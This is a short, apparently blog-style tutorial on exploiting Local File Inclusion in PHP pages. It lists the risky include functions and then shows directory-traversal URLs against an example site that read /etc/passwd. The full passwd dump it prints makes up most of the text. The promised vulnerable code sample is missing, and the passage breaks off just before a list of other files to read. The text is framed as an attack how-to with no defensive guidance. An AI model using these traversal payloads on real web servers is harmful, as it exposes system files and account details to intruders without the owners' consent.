Exploiting Local File Inclusion vulnerability(LFI)

4

Local File Inclusion mean loading local file such as /etc/passwd , /etc/host on the php web pages. There are many programing mistake for occurring this vulnerability. When Programer put some bad in the php web pages that time this vulnerable occur:

include
include_once
require
require_once
fopen

For example, suppose in a pages :

This is code is vulnerable to Local file inclusion vulnerable.

Suppose , Our target url is www.n00bprogammer.com/vulnerable/

If you directly submit this url on browser address bar then you get web page , That’s mean there is a file “index.php”

If we try like :

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work)

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../../../etc/passwd

And it output :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
haldaemon:x:109:117::/var/run/hald:/bin/false
kdm:x:110:65534::/home/kdm:/bin/false

That’s mean it worked. But modern unix like system now does not include the hash in the /etc/passwd (All hash on /etc/shadow)… So there is no permission then you can’t read /etc/shadow file.

There are many file you may interest to read :